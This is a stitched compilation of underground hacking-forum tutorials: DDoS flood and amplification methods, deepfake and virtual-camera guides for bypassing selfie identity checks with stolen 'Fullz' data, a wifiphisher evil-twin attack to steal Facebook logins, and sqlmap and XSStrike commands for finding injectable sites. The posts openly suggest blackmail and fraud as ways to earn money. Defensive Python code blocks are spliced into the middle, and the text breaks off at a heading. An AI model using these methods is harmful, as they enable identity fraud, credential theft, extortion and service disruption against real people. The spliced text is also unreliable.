RST / FIN Flood - In this case, to close the TCP-SYN session, RST or FIN packets are exchanged between the client and the host. During an RST or FIN flood, the victim's server at high speed receives fake RST or FIN packets that are not related to any of the sessions in the server's database. During an RST or FIN flood, the victim's server is forced to allocate a significant amount of system resources (again, this is RAM, CPU, etc.) to match incoming packets with current connections, which leads to a loss of server performance and to its partial inaccessibility.

ACK Flood - In this case, with a fragmented ACK flood, packets of the maximum allowable size (for example, 1500 bytes) are used to fill a significant channel bandwidth with a relatively small number of transmitted packets.
Fragmented ACK packets usually pass through routers, firewalls and intrusion prevention systems easily, since these devices do not reassemble fragmented packets at the network layer. Typically, these packets contain random data. Since the attacker's goal is to fill the entire bandwidth of the victim's external network channels, this type of flooding reduces the performance of all servers in the attacked network.

ESSYN - Essentially the TCP SSYN method, but rewritten by Starfall in 2013. Rumor has it that it is more effective. Apparently these are not rumors.

xSYN - Also the TCP SSYN method, but also rewritten by Starfall in 2013.

FAQ:
Using the poke method. It happens that sites put the same SYN cookie, which you will not immediately notice and is filtered, but there are few brains in the CIS, and all are stupid. + depending on what kind of protection, but more on that later.
Yes! But it makes sense to run several at once, if you can run dominate.
ASK

I have tried to describe TCP methods as easily as possible in order to start the long journey of UDP methods.

UDP Flood - During a UDP flood, the victim's server receives a huge amount of spoofed UDP packets from a wide range of IP addresses. The victim's server or the network equipment in front of it becomes overwhelmed with fake UDP packets. The attack provokes congestion on network interfaces by occupying the entire bandwidth. In UDP, there is no concept of establishing a connection (handshake) as in TCP. This makes filtering UDP flooding while maintaining legitimate UDP traffic an extremely difficult task, as well as an effective way to flood the channel. UDP flood strikes the network with packets containing random or static IP addresses, and can be implemented to disable the server using information about it, such as the target port of the legitimate service and the destination IP address.
Due to the complexities of checking UDP traffic (there is no mechanism for checking a session like with TCP), many telecom operators offer their customers traffic blocking according to various criteria, which is essentially saving the network by blocking individual servers.

NTP Amplification - This is a type of transport layer DDOS attack in which a publicly available NTP (Network Time Protocol) server is used to generate junk traffic. So, by sending short requests to one of the open NTP servers, you can get a response tens of times larger (amplification effect). We use this by sending requests with the address of the victim server as the IP address of the request source. As a result, the victim's server network is overloaded with "garbage" UDP traffic, from which it is quite difficult to identify legitimate NTP requests and responses. Implementing this method is as easy as shelling pears, like all amplification methods. This method uses port 123.

DNS Amplification - This type of transport layer DDOS attack uses the specifics of DNS services on the network. The point is to request domain information from a public DNS server and send its response to the attacked server. When implementing this type of attack, we form and execute a request in response to which the DNS server returns as much data as possible, for example, requesting a list of all DNS records in a specific zone. Because the UDP protocol does not verify source IP addresses, we hammer out, in short, requests on behalf of the victim's server, indicating its IP address in the outgoing address field. The main goal here is to fill the victim's server channel with voluminous responses from public DNS servers. So, using a good worksheet for generating queries to public DNS servers, we can increase the flow of generated junk traffic up to 100 times.
At the same time, it is almost impossible to figure us out or calculate at least the IP addresses of the query generators, since the real outgoing IP address is always replaced with another one. Although the method is old, it still lives on. This method uses port 53.

Chargen Amplification - This type of transport layer DDOS attack works the same as NTP amplification, only requests are sent to servers using the Chargen service. This method is practically no different from other amplifications, well, and another port is also used, 19. This method is also easy to implement with spoofing.

SSDP Amplification - This method is a UDP based protocol that uses universal Plug and Play devices for amplification, which allows requests to be sent using port 1900. SSDP is one of the strongest methods, outperforming NTP, DNS, Chargen, etc.

VSE - This type of transport layer DDOS attack is aimed at attacking Valve's servers. Very efficient and also used for other game servers, uses port 27015.

That's all for today. Continuation in the next article, which will be released very soon!
Hey Freaks! Today I am gonna show you how to create an SMM panel without any coding and web design knowledge, free without paying anyone, and you'll create your own SMM in a few minutes.

For those who don't know "WHAT AN SMM PANEL IS":

Social Media Marketing (SMM) is a type of internet marketing that uses the benefits of social networking sites as a tool for promoting websites, thus increasing traffic towards them and learning from users' direct reactions.

IN SIMPLE LANGUAGE: SMM Panels are known as Social Media Marketing Panels. You can purchase views, likes, comments, subscribers, followers, etc.

Step-by-step instruction

1️⃣ We go to the site and register.
2️⃣ Click "Create Panel".
3️⃣ Select "Panel".
4️⃣ Enter your domain in the first line.
5️⃣ Go to the domain registrar's page (where you ordered the domain).
6️⃣ Select the desired domain and enter the DNS server data:
▫️ dns1.socpanel.com
▫️ dns2.socpanel.com
So that's it!
7️⃣ Click "Save".
└After that, you need to wait for the domain to bind to the DNS servers (from 24 to 48 hours). It usually takes about 3.
8️⃣ Go here and click on the "Settings" button.
9️⃣ Click on "Add provider" and enter the number. If there is no provider, the window will look something like this: 👇
🔟 We add the necessary services and payment methods.
└Everything is intuitive here.
➡️ Done!

The next step is to set up an automatic purchase on other services, put a winding price tag and catch up with traffic.

Summary

As you can see, there is no need to overpay coders and designers. Raising your own SMM panel is a matter of a few minutes. When you redeem, what's what. Keep your finger on the pulse to be aware of this movement!

Your DW.

THAT'S IT, GOOD LUCK FREAKS.
Hey Freaks! Hackfreaks here. In this article, we will tell you step by step how to bypass selfie verification, all methods comprehensively: account verification on exchanges, loan sites, etc. (you know better ;)) and earnings on this.

METHOD 1

We take the Fullz data for verification on the exchange. We make ourselves documents, or rather print a fake document with a photo; you can laminate it. Next, we take the printed document in our hands and follow the instructions. We change the face — we get a verification.

https://github.com/alievk/avatarify — allows you to swap your face in real time, during a video call on Skype or Zoom.

Installation instructions on Windows

1) Go to this site and download Miniconda python 3.7:
2) Install https://git-scm.com/download/win

Next, enter "Miniconda" in the start-up, and open the Anaconda prompt. We enter the commands in the console in order:

git clone https://github.com/alievk/avatarify.git
cd avatarify
scripts\install_windows.bat

After successful completion, download additional resources from https://drive.google.com/file/d/1L8P-hpBhZi8Q_1vP2KlQ4N6dvlzpYBvZ/view, https://yadi.sk/d/lEw8uRm140L_eQ/vox-adpth.cpk or https://mega.nz/file/R8kxQKLD#036S-bobZ9IW-kNNcSlgpfJWBKSi5nkhouCYAsxz3qI (of your choice). Then we place vox-adv-cpk.pth.tar in the avatarify folder (don't unpack it).
The avatarify folder is located at C:\Users\{username}. After that, if you have already closed the Miniconda console, then open it again and write:

cd C:\Users\username\avatarify

And after that we run the following:

run_windows.bat

Make sure that your RAM is not full, because at the first start the program will download and install the elements it needs. After a successful launch, 2 windows will appear on the screen, one with an image from a web camera, and the other with Avatarify.

Control
1–9: switch between faces;
0 (zero): turns the display of the Avatar on or off;
A / D: previous / next avatar from the folder;
W / S: zoom the camera;
Z / C: adjust the opacity of the Avatar overlay;
X: resets settings, helps before use;
F: search for window and support;
R: webcam mirroring;
T: mirror image of the avatar;
I: show FPS.

Avatar management

Here are the basic principles for managing your avatar:
Align your face in the camera window as close as possible in proportion and position to the target avatar. Use the zoom in / out function (W / S keys). When you're aligned, press X to use that frame as a reference to control the rest of the animation.
Use the overlay function (Z / C keys) to bring your and the avatar's expression as close as possible.
Alternatively, you can press "F" for the software to try to find the best position. This will slow down the frame rate, but while this is happening, you can keep moving your head: the preview window will flash green when it detects that your face pose is closer to the avatar than the one it is currently using. You will also see two numbers: the first number is how close you are currently aligned with the Avatar, and the second number is how close the frame of reference is. You want to get the first number as small as possible — around 10 is usually a good alignment. When you're done, press "F" again to exit keyframe search mode.
You don't need to be precise, and some other configurations may give even better results, but this is usually a good starting point.

Now, download the plugin for OBS, as well as OBS Studio itself: https://obsproject.com/forum/resources/obs-virtualcam.539/ (choose to install and register only 1 virtual camera).

Launch OBS. In the Sources section, click the Add button (plus sign), select Windows Capture and click OK. In the window that appears, select "[python.exe]: avatarify" from the drop-down menu of the window and click the OK button. Then select Edit -> Transform -> Fit to screen.

In OBS Studio go to Tools -> VirtualCam. Check autorun, set Buffered Frames to 0 and click Start. The OBS-Camera camera should now be available in Zoom (or other video conferencing software).

We set up gps for registration and look for a clean ip for the city of registration!

METHOD 2

https://youtu.be/q44LPygdMxU
Link to DeepFaceLab: https://github.com/iperov/DeepFaceLab

Required files:
cuda_9.2.148_windows.exe (then restart)
cuda_9.2.148.1_windows.exe
cudnn-9.2-windows7-x64-v7.1.zip

Developer video: https://youtu.be/K98nTNjXkq8

IMPORTANT !!!! Regardless of how long your video is running, face swap processing will take the same amount of time. The more iterations, the better. In the video with Lesha Shevtsov (itpedia), almost 80,000 were used. For the coolest indicator, you can use 500,000 (it will take 3–4 days, it all depends on the graphics card).

This is exclusively my rough draft for notes, I did not try to adapt it for anyone, I only did it for myself.

---

1) AT THE ROOT OF THE DISC

There are versions after downloading:
DeepFaceLabCUDA9.2SSE for NVIDIA graphics cards up to GTX1080 and any 64-bit processors.
DeepFaceLabCUDA10.1AVX for NVIDIA graphics cards up to RTX and processors with support for AVX instructions.
DeepFaceLabOpenCLSSE for AMD video cards and any 64-bit processors.

2) Put 2 files into the workspace folder.
The first one is data_dst.mp4 — this is the face that will be replaced.
The second is data_src.mp4 — this is the person who will be used for the replacement.

3) Order
2) extract PNG from video data_src.mp4 — the program extracts the face that WE WILL REPLACE. Face in PNG format.
3.2) extract PNG from video data_dst FULL.mp4 — the program extracts the face that WILL BE CHANGED. PNG format.
4) data_src extract faces MT all GPU — extracts a finite set of faces from PNG to the workspace\data_src\aligned folder.
4.1) data_src check result — check how the person, WHICH WE WILL REPLACE, was extracted.
4.2.2) data_src sort by similar histogram — After this sorting, the faces will be grouped by content, so it's much easier to filter out unwanted faces. Scroll and delete unwanted faces in groups.
4.1) data_src check result — check how the person, WHICH WE WILL REPLACE, was extracted. We delete unnecessary ones. You see, the faces are now in line with the turn of the head.
1) data_src sort by blur.bat — Sort by sharpness. Run and wait for sorting. Then see the results. The dullest faces will be at the end. It is important for src to remove cloudy faces.
4.1) data_src check result — check how the person, WHICH WE WILL REPLACE, was extracted. We remove unnecessary CLOUDY FACES.
5) data_dst extract faces MT all GPU — Same as item 4, with some differences. If a face was not detected in some frame, then there is an option + manual fix for this — it allows you to manually specify faces in frames where no faces were detected at all.
5.1) data_dst check result
5.2) data_dst sort by similar histogram — If the target video contains other unwanted faces, you can do this sorting, and then it will be easier to remove these faces.
5.1) data_dst check result — remove unnecessary frames
6) train H64 best GPU — better CTRL + F "train … bat" training in manual_ru.pdf. WE WAIT !!!
6) train H64 best GPU — once again. Some diagrams appear, then it closes.
7) convert H64 debug — convert … .bat face overlay. The debug option allows you to see the process of overlaying faces and some technical information for each frame in the console; press the spacebar in the viewport. It seems like he always clicked 0. -3.01 in the video.
7) convert H64 debug — AGAIN? Combinations: one one empty empty -five empty empty empty !!!
7) convert H64 debug — AGAIN? Combinations: one one twenty 40 empty empty empty empty
7) convert H64 — Combinations: one one twenty 40 empty empty empty empty. WAITING FOR COMPLETION
8) convert to mp4 — WAITING FOR COMPLETION. Go to the RESULT folder and see a new file result.mp4

---

Configs if you want to train with SAE:

== Model options:
== autobackup: True
== write_preview_history: True
== batch_size: 2
== sort_by_yaw: False
== random_flip: False
== resolution: 192
== face_type: f
== learn_mask: True
== optimizer_mode: 2
== archi: liae
== ae_dims: 192
== e_ch_dims: 42
== d_ch_dims: 21
== multiscale_decoder: true
== ca_weights: true
== pixel_loss: False
== face_style_power: 10
== bg_style_power: 10
== apply_random_ct: true
== clipgrad: true
== Running on:
== [0: GeForce GTX 1080]

On the A64, everything is by default.

---

ADVICE

H128, DF, LIAEF128 models: Use pixel loss? (y / n, ?: help, skip: n / default): allows you to quickly improve fine details and remove jitter. Enable only after 20k iterations.

---

Site of the second program: https://faceswap.dev/forum/viewtopic.php?f=5&t=27

---

IMPORTANT !!!! Regardless of how long your video is running, face swap processing will take the same amount of time.
For the coolest indicator, you can use 500,000 (it will take 3–4 days, it all depends on the video card).

We set up gps for registration and look for a clean ip for the city of registration!

---

METHOD 3

---

https://www.elladodelmal.com/2019/04/autoencoders-gans-y-otros-chicos-buenos_10.html — ARTICLE.

We set up gps for registration and look for a clean ip for the city of registration!

---

METHOD 4

Substitution of the image in the camera. In this way, for example, you can register carder accounts on fake data, because in some applications it is impossible to load existing photos; for this we just need an installed Linux operating system.

1. Install the virtual camera

Install the codec:
apt-get install git make ffmpeg

Clone the driver repository:
mkdir codek
cd codek
git clone https://github.com/umlaeute/v4l2loopback.git
cd v4l2loopback

Install:
make && sudo make install
sudo depmod -a

And we launch:
sudo modprobe v4l2loopback

We have a device /dev/video0 (or the number above if you already had something).

2. Start the translation of the image into the video stream of the driver

ffmpeg -loop 1 -r 1/5 -i "path_to_image" -c:v libx264 -vf fps=25 -vcodec rawvideo -pix_fmt yuv420p -threads 0 -f v4l2 /dev/video0

We must specify -loop 1 to loop this action.

3.
Well, now the final stage, this is emulation: open Android Studio, open the window where the virtual machine is edited and in the camera settings select our virtual device, start and take off life.

We set up gps for registration and look for a clean ip for the city of registration!

METHOD 5

---

https://www.limontec.com/2018/02/deepfakes-criando-videos-porn-falsos.html — ARTICLE
https://youtu.be/D-96CM4chHc

We set up gps for registration and look for a clean ip for the city of registration!

METHOD 6

Creation of camera spoofing
https://github.com/corkami
https://github.com/corkami/mitra

file1                  first (top) input file.
file2                  second (bottom) input file.

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  --verbose             verbose output.
  -n, --nofile          Don't write any file.
  -f, --force           Force file 2 as binary blob.
  -o OUTDIR, --outdir OUTDIR
                        directory where to write polyglots.
  -r, --reverse         Try also with <file2> <file1> - in reverse order.
  -s, --split           split polyglots in separate files (off by default).
  --splitdir SPLITDIR   directory for split payloads.
  --pad PAD             pad payloads in Kb (for expert).

We set up gps for registration and look for a clean ip for the city of registration!

METHOD 7

For those who could not pass verification (and I know that there are many of them). Keep a fit. After all, Badoo is one of the leaders in the number of mammoths and wankers. Snapchat has a gender reassignment filter. This feature allows you to easily pass verification on Badoo, and then accept jerk traffic and make money on it in all known ways.
You need to open the camera in the application; to the right of the "Take photo" button there is a drop-down gallery of masks — the necessary filters are there.
Among the "masks" there are two: one with a man's face, the other with a woman's. These are the "gender reassignment" filters.
After activating the filter, you need to position the camera so that the face falls within the boundaries of the "mask".
The filter works only in "live" mode; you cannot add photos from the gallery. But you can switch to the rear camera and, for example, capture the face of the person in the photo.

We set up gps for registration and look for a clean ip for the city of registration!

METHOD 8

First, go to https://developer.nvidia.com/cuda-80-ga2-download-archive and install CUDA 8.0. The installation is standard; after it we reboot. You don't need to patch anything.

Download FakeApp.
Download ffmpeg: https://ffmpeg.zeranoe.com/builds/

IMPORTANT! LET'S REPEAT POINT BY POINT !!!

We unpack FakeApp.zip to the root of the C drive. Also, in the root of the C drive, create the fakes folder, and inside it we create the data, data_A, data_B folders. Unpack ffmpeg into the FakeApp folder. We get such a picture.

Video preparation stage

I have uploaded a video from the interview of Chloe Moretz and now I need to cut sections of the video with her face using any video editor. Save the cut video in 720p quality to the C:\fakes\data_A folder and call it 1.mp4.

We launch the command line and write:

C:\FakeApp\ffmpeg\bin\ffmpeg.exe -i C:\fakes\data_A\1.mp4 -vf fps=25 "C:\fakes\data_A\out%d.png"

In the C:\fakes\data_A folder, we see how the pictures appear; we wait for the process to complete. After completion, delete the video 1.mp4 in the C:\fakes\data_A folder.

Run fakeapp.bat in the C:\FakeApp folder. Select Align, specify C:\fakes\data_A in the Data field. Click Start. WE ARE WAITING FOR FULL COMPLETION!
An aligned folder will appear in the C:\fakes\data_A folder where all her faces are ordered.

Stage # 2

Find a video for a friend and repeat the whole process, only instead of data_A we specify data_B. The main video for a friend should be one face; if there are several faces in the frame, the program will change all of them.

After the aligned folder with ordered faces appears in the data_A and data_B folders, we proceed to training. This process is an asshole, because it takes a lot of time to train a neural network.

Go to the Train tab. In the Data A field, specify the path C:\fakes\data_A\aligned. In the Data B field, specify the path C:\fakes\data_B\aligned. Click Start and wait. We observe how the neural network gradually learns and the quality of the photo improves. If you are tired of waiting or the quality suits you, press the Q key; the program will save the "weights" of connections and you can continue the calculations in the future, nothing is lost. The neural network will learn for about a day on a 1050ti. It doesn't take long to glue the finished video; it takes a maximum of 1 hour.

METHOD 9

Well, the game is easy, nothing much. Install the Crazytalk free software from the internet, or any similar 3D animator will work. Use the portrait picture which you used in the DL. With the Crazytalk software you can make the face of a picture move. I'm attaching 2 kinda video tutorials with this article.

Video tutorial:
1: https://youtu.be/y6NSEoPq_0Q
2: https://youtu.be/CPMkAqoLCAM

After that, export it or screen-record the moving face. Now install ManyCam or similar software. They turn your webcam into any custom video you need. Set up ManyCam (some settings need to be done, you can learn from YouTube). After that, add the face-moving video to the ManyCam software. At the verification page, when it opens the camera, ManyCam will work as the camera. You can use or set the picture or any video of your choice that you want to show.
So during verification, when it asks for camera verification, ManyCam will open instead of the webcam and will play the video or photo you inserted. When you put a face-moving video, they will recognise it as real and will verify you. Also to upload the DL you can use the same way.

That's it, best of luck.

Donate: 32GFwevY5gFQ4qNU19hEaPUSDwT9g7X4zr

Passes for SBA and PPP Easily

WARNING

Monetization options
Webcams; Blackmail; Identification; Etc.
- you fasten the client's photo to the "naked body"
- you attach a photo to a video and go through identification in affiliate programs / services

We set up gps for registration and look for a clean ip for the city of registration!

bitzlato
hodlhodl
paxful
bitpapa
cryptolocator
localcryptos
localcoinswap
garantex
Whitebait
Totalcoin
Risex
Vertex
prizmBit
Bitcoinglobal
skyBTCbanker
SkyCrypto
monabey
bisg
Localmonero
AgoraDesk
And others.

If you have something to add or refute, write: Here

Thanks for reading!
What do you need

Our main tool is wifiphisher. All actions must be performed on a machine with Kali Linux installed. Remember, you can always use VirtualBox with the distribution installed. What else? You need a USB WiFi adapter, preferably something from Alfa or TP-Link.

WARNING

Step-by-step instruction

1️⃣ Clone the roguehostapd repository.
• git clone https://github.com/wifiphisher/roguehostapd
2️⃣ Install wifiphisher.
• git clone https://github.com/wifiphisher/wifiphisher
• cd wifiphisher
• sudo python setup.py install
3️⃣ Enter the wifiphisher command (no dot). This is roughly what we will see when we enter the command. And then a window like this will open: here you can see which Wi-Fi networks are nearby.
4️⃣ Select the desired access point (press ENTER). Then it will be redirected to the page where the attack will start.

➡️ The attack takes place in 3 stages:
Sending deauthentication packets.
└This is necessary for the client devices to disconnect from the network and try to initiate a new connection to the Wi-Fi router.
Checking the number of connected victims.
└This way we can understand how many people are connected to our Wi-Fi hotspot.
HTTP requests.
└They show what request is being sent to the victim's web browser by our hotspot.

Here's what mammoths will see when they connect to our Wi-Fi hotspot. Here, the user who is trying to connect is prompted to enter their Facebook login credentials (just an example). So you need to get access to Wi-Fi. Mammoths drive in data, and we intercept it. This is what the victim will see when he "logs in" to Facebook.

➡️ Done! We received the victim's credentials, which means we can log into the account and do whatever we want there.

Summary

Never connect to open free Wi-Fi hotspots, only visit websites with HTTPS encryption, and never use your credentials to log in to websites with HTTP. If you really need to, at least use a VPN. It will encrypt traffic.

Stay Connected! Your DW.

Thanks for reading!
How To Check Site Vulnerabilities. Step By Step, Part 2.

We continue the topic from the previous article.

Checking the authorization forms

You can find authorization forms using the following command (instead of <target>, substitute the domain of your site):

After you have found the pages with authorization, you can try to pick a password and login to enter the site's admin panel.

Parameters:
http-brute.hostname — hostname
http-form-brute.path — the address of the page with the form or the address with the API
http-brute.method — method type, POST by default
http-form-brute.uservar — sets the name of the variable that is responsible for the username. If not set, the script will take the field name from the form
http-form-brute.passvar — sets the name of the variable that is responsible for the password. If not set, the script will take the field name from the form

Parameters must be listed separated by commas after --script-args.

If the script succeeds, it will output something like this:

If the authorization form uses cookie parameters or a csrf-token, then in this case it will give an error. This means that basic protection is present.

3. We are looking for hidden folders and files

Often, developers or system administrators are rather negligent about access rights and forget to close access to system and other important folders. You can also check if we have such folders on the server using the nmap utility. The commands will look like this (instead of <target>, you need to substitute the server IP address or site domain):

As a result, the report will show us the folders available for viewing, interesting files — password files, database backups, etc. (if such exist). An example of a small report:

4. Checking for SQL injection

It so happened that most modern web applications use SQL databases to one degree or another. Usually, parameters of a web page or some user data are substituted into SQL queries and the results of the query are displayed on the web page.
If the passed parameters are poorly filtered, then the web service becomes vulnerable to SQL injection. If the site is vulnerable to such injections, then in fact it is possible to do whatever you want with the database (most often MySQL). This is how user bases and their personal data are most often stolen. Next, I will show how, using scripts, to quickly and efficiently check whether there are such vulnerabilities in the site of interest to us. Often, even fairly experienced developers forget about precautions, which is why even serious products have similar problems. Let's try to check our test web service for such problems using the sqlmap tool.

Install sqlmap

Sqlmap is an open source cross-platform scanner that allows you to automatically test web services for SQL injection and then use them to gain control over the database. In this article, we will only consider the methods of how to find pages, APIs and forms vulnerable to SQL injection, without details on how to use the found vulnerabilities to cause harm. This is what we teach in our freaks Hub.

Installation on Windows

To get started, we need to install Python. The Python installer for Windows can be found on the official website. The site has two branches, 2.x and 3.x, but it's better to download and install the 3.x branch. Sqlmap works correctly with each of these versions, but in the future we will need version 3.x. You can download the latest sqlmap here. Unpack the archive into any convenient folder (to make it easier to find, you can unpack it to the folder C:\Users\<your username>). To start, you first need to open a command line. Press Win + R, in the window that appears type cmd and press Enter. Launch example:

We start checking

In my test service, I specially prepared SQL vulnerabilities. Let's try to find them with the following command. The --dbs option means that we are interested in the names of the databases.
If successful and there is a vulnerability, after defining the databases, you can proceed to search for tables and obtain the required data. The command must be entered into the console. After a while, the script may ask us to clarify some data. In this case, I choose "no" so that the script will run all tests. The script displays a report:

After continuing the analysis, we are primarily interested in the line at the end:

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

As you can see, the script determined that the id parameter is vulnerable and suggests testing other parameters. In our particular case, there are no other parameters, but in real web applications there can be dozens of such parameters, so sometimes it makes sense to check everything. Final report:

As a result, the script not only determined that the id parameter is vulnerable, but also the version of the DBMS, and also obtained the name of the database used on the server, vc_test, which contains the content of the site. This information can be found at the end of the generated report. In the future, it is usually no longer a problem for a hacker to get data from tables, and possibly full control over the entire database, or even the entire server and the source code of the site, if a user with broad rights is used for queries.

In addition, sqlmap allows you to set HTTP headers and Cookie parameters, which is quite convenient for testing, especially when authorization is required to get the result of the request. An example of testing a POST request. Parameters that are passed in the body of the request are written to the script option --data. The necessary parameters for a POST request can be spied on in the browser console (Ctrl + Shift + I in Windows, then go to the Network tab, take the desired action, and then study how the request is formed). After authorization, it is usually necessary to transfer the required cookies.
In sqlmap, the --cookie option is responsible for this. The required cookie values can be obtained in the developer tools of your browser (in Windows Ctrl + Shift + I, then find the Network tab, and in it click on the request with the site's domain name; in the window on the right, scroll until you see the cookie parameter). Sample sqlmap command with the --cookie option:

sqlmap.py -u http://localhost/create --data="name=alex&message=hacked" --cookie="security_level=low; PHPSESSID=05aa4349068a1kkaje4kcqnr9o6" --dbs -o --random-agent

If there are several parameters, then you can explicitly specify which parameter will be tested using the -p option. You can set HTTP headers using the --headers option. This is extremely useful for testing your APIs. Also, if the parameter is passed not as a GET parameter but as part of the URI, then in this case it is necessary to explicitly indicate using * that this part of the URI is a parameter. Example:

sqlmap.py -u "http://localhost/api/v2/news/2*" --headers="Authorization: Bearer <token>" --dbs -o --random-agent

Thus, you can test your web application for SQL injection rather thoroughly. It is also extremely useful to use sqlmap for automated tests. To protect against SQL injection, you need to carefully filter parameters and HTTP headers, and also use prepared queries.

5. Checking for XSS vulnerabilities

Cross-site scripting (XSS) is a vulnerability that involves an attacker injecting their own JavaScript code into a web page that is displayed in a user's browser. After such an injection, the hacker actually hijacks the web page and can manipulate the user's data while he is on the page. If successful, he can:

Embed his scripts into a web page
Send user data to his server: bank cards, session IDs, passwords, etc.
Take actions on behalf of the user: send spam, make money transfers

The vulnerability occurs due to insufficient filtering of data that is displayed when the page is rendered.
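Going back to the closing advice of the SQL injection section (filter parameters, use prepared queries): the example below is added here by the editor and is not code from the article or from the test blog it describes. It models a news endpoint like the /api/v2/news/<id> one tested with sqlmap above, with a constructed in-memory SQLite table, and shows the string-formatted query that produces sqlmap's "GET parameter 'id' is vulnerable" verdict next to its parameterised and type-validated replacements.

```python
import sqlite3

# Constructed sample table (not the article's vc_test database): a tiny "news" table
# like the one behind a /api/v2/news/<id> endpoint. Row 3 must never reach the client.
NEWS = [
    (1, "First post", "public"),
    (2, "Second post", "public"),
    (3, "Draft, not yet published", "private"),
]


def make_db():
    """Create an in-memory SQLite database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER, title TEXT, visibility TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?, ?)", NEWS)
    return conn


def get_news_vulnerable(conn, news_id):
    """The 'before' pattern: the id parameter is pasted straight into the SQL text.
    Anything the caller puts in news_id becomes part of the query, including the
    trailing visibility filter, which an input like  2' OR 1=1 --  comments out."""
    query = "SELECT id, title FROM news WHERE id = '%s' AND visibility = 'public'" % news_id
    return conn.execute(query).fetchall()


def get_news_safe(conn, news_id):
    """The hardened form: a prepared (parameterised) query. The driver sends the value
    separately from the SQL text, so it can never change the query structure; a
    non-numeric string simply fails to match the INTEGER column and yields no rows."""
    query = "SELECT id, title FROM news WHERE id = ? AND visibility = 'public'"
    return conn.execute(query, (news_id,)).fetchall()


def get_news_validated(conn, news_id):
    """Belt and braces: validate the parameter's type before it reaches the database.
    A news id that is not a plain number is rejected outright (returns None) instead
    of being handed to the query at all."""
    if not str(news_id).isdigit():
        return None
    return get_news_safe(conn, int(news_id))
```

Run the three functions with a normal id and then with the tautology input from the comment above: the vulnerable query returns every row, including the private draft, while the prepared query returns nothing and the validated wrapper refuses the input before any SQL runs.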
Such vulnerabilities are quite common even in large products, so you should definitely test web applications for XSS vulnerabilities. In this case, we will use the XSStrike utility for testing. XSStrike is a fairly advanced open source XSS vulnerability scanner. It is written in Python 3 and is fairly easy to set up and use.

Installation

To install, you need to download the archive from the link and unpack it into a folder convenient for you. After that, you need to open the console and go to the unpacked folder. Then you need to run the commands in the console. Install the libraries necessary for correct operation:

We are now ready to test. An example of a simple launch; instead of my URL, specify the address of the page you want to test:

Very quickly, the script discovers that the page parameter is vulnerable (the Reflections found line) and through it you can pass JS code that will be executed on the page. An example of such code is given in the Payload line. This type of XSS vulnerability is called reflected XSS. In addition, you can validate forms as well. Let's send for review a form that sends a message to our service. To pass a list of POST parameters, use the --data option. Result: the name parameter is vulnerable.

What the response looks like when the script does not find vulnerable parameters:

In addition, XSStrike supports the ability to transmit HTTP headers, including cookies, and check pages that need authorization to open. The --headers option is used for this:

python xsstrike.py -u "http://161.35.92.161/index.php" --data "name=&message=" --headers "Authorization: Bearer <token> Cookie: zmname\=none" --blind

You can also run a crawl across the entire site. You need to specify a start page and the scanner will start crawling all found pages. The -l 100 entry controls the number of crawled pages. The script will show the pages on which vulnerable parameters were found. The found pages can already be investigated in more detail.
Also a useful feature is traversing the URLs of pages that are specified in a file using the --seeds option. It can also be used in conjunction with the --headers option. Thus, you can thoroughly check any web application for XSS vulnerabilities.

Conclusion

We hope this guide is helpful to you. This knowledge, which we gave you in the two parts of this article, has endless monetization options. Note that it is also worth checking not only the site itself, but also admin panels and auxiliary services on subdomains, because they can also be vulnerable to such automated systems and scripts. Thank you all for your attention!
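For the XSS section above, which traces the vulnerability to insufficient filtering of data at render time, here is an added editor's example, not code from the article or from the test blog it scans. It renders a comment with the same two fields the article submits (name and message) first by plain concatenation, the shape XSStrike reports as "Reflections found", and then with output escaping chosen for the context each value lands in; the sample inputs are constructed.

```python
import html
import re

# Constructed sample submission to a comment form like the one the article tests with
# --data "name=&message=": the message smuggles a script tag, the name tries to break
# out of a double-quoted HTML attribute.
SAMPLE_NAME = 'alex" onmouseover="alert(1)'
SAMPLE_MESSAGE = "hi <script>alert(1)</script>"

# Page template used by both renderers: the author's name lands in an attribute and in
# a text node, the message in a text node only.
TEMPLATE = '<div class="comment" data-author="%s"><b>%s</b>: %s</div>'

# Matches the start of any opening or closing tag.
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z]")


def render_comment_vulnerable(name, message):
    """The 'before' pattern: user input concatenated into the HTML unchanged. XSStrike's
    'Reflections found' line flags exactly this shape: the input comes back verbatim."""
    return TEMPLATE % (name, name, message)


def render_comment_safe(name, message):
    """Hardened form: escape at output time, for the context the value lands in.
    html.escape(quote=True) rewrites <, >, &, " and ', which is enough for a text node
    and for a double-quoted attribute; it is NOT enough for unquoted attributes, URLs
    or inline scripts, which need their own encoders."""
    safe_name = html.escape(name, quote=True)
    safe_message = html.escape(message, quote=True)
    return TEMPLATE % (safe_name, safe_name, safe_message)


def count_tags(rendered):
    """Number of tag starts in the output. The template contributes exactly four
    (div, b, /b, /div); anything above that came from user input."""
    return len(TAG_RE.findall(rendered))


def reflects_unescaped(rendered, user_input):
    """Regression check for a test suite: input containing HTML metacharacters must not
    reappear verbatim in the rendered page."""
    if not any(c in user_input for c in '<>"\'&'):
        return False
    return user_input in rendered
```

The two helper checks at the bottom are the kind of assertion worth keeping in an application's own test suite next to the scanner runs: they fail as soon as a template starts echoing raw input again.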
How To Check Site Vulnerabilities. Step by Step, Part 1

Hey Freaks! Hackfreaks here. In this article, we will tell you step by step how to comprehensively scan a site for vulnerabilities in half an hour, even if you are not a hacker. Now, most articles on the Internet on the topic of searching for vulnerabilities on your own site are divided into two types: either a banal list of online scanners without detailed instructions on how to use them, or hardcore manuals for information security fans and other hackers, where you cannot figure it out without Linux. Not all of our subscribers are like that, so it was decided to make an article where we will consider the process as simply and in as much detail as possible. Now we will clearly and step by step show how to independently check the site of interest using such tools, as well as how to understand the generated reports.

What we will check:

Access to server and source codes
Vulnerabilities in web servers (Apache or NGINX)
SQL injection
Cross-site scripting (XSS)
Application and server resistance to brute-forcing passwords
Gaining access to system catalogs

As a test site, we wrote and deployed a small self-written blog with the ability to leave comments on articles and added the entire gentleman's set to it:

Numerous SQL injections
XSS vulnerabilities
Simple password for SSH access
Open FTP
Lack of protection against brute-force passwords
Database accessible from the Internet with a simple password
Too broad access rights to folders and files

In general, everything is how it should not be done. But many do it anyway :)

1. Checking the network infrastructure

